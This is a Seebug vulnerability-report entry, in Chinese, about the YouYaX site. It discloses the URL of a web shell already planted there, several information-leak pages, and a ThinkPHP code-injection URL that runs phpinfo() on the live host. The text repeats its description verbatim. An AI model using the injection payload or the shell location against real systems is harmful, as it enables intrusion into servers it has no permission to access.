YouYaX捡到一枚shell

2014-06-09T00:00:00
ID SSV:95202
Type seebug
Reporter Root
Modified 2014-06-09T00:00:00

Description

简要描述:

YouYaX捡到一枚shell

详细说明:

YouYaX捡到一枚shell,附送几个信息泄漏吧 http://www.youyax.com/404/shell.php

<img src="https://images.seebug.org/upload/201406/09160031206c2d06c633ae539af1a463a7345222.png" alt="99.png" width="600" onerror="javascript:errimg(this);">

还有没有其他的,还请自查 http://www.youyax.com/tp/index.php/module/aciton/param1/$%7B@phpinfo()%7D http://www.youyax.com/plugin_list.php http://www.youyax.com/pi.php 其他还请自查

<img src="https://images.seebug.org/upload/201406/091108329173fd0ae11d63bc32cc50bd888e6fe2.png" alt="99.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201406/09110901afb40befcbf54c0523a48f5873e33e85.png" alt="99.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201406/091109347651bb4ec531f484e95aff6a446dca4d.png" alt="99.png" width="600" onerror="javascript:errimg(this);">

漏洞证明:

YouYaX捡到一枚shell,附送几个信息泄漏吧 http://www.youyax.com/404/shell.php

<img src="https://images.seebug.org/upload/201406/09160031206c2d06c633ae539af1a463a7345222.png" alt="99.png" width="600" onerror="javascript:errimg(this);">

还有没有其他的,还请自查 http://www.youyax.com/tp/index.php/module/aciton/param1/$%7B@phpinfo()%7D http://www.youyax.com/plugin_list.php http://www.youyax.com/pi.php 其他还请自查

<img src="https://images.seebug.org/upload/201406/091108329173fd0ae11d63bc32cc50bd888e6fe2.png" alt="99.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201406/09110901afb40befcbf54c0523a48f5873e33e85.png" alt="99.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201406/091109347651bb4ec531f484e95aff6a446dca4d.png" alt="99.png" width="600" onerror="javascript:errimg(this);">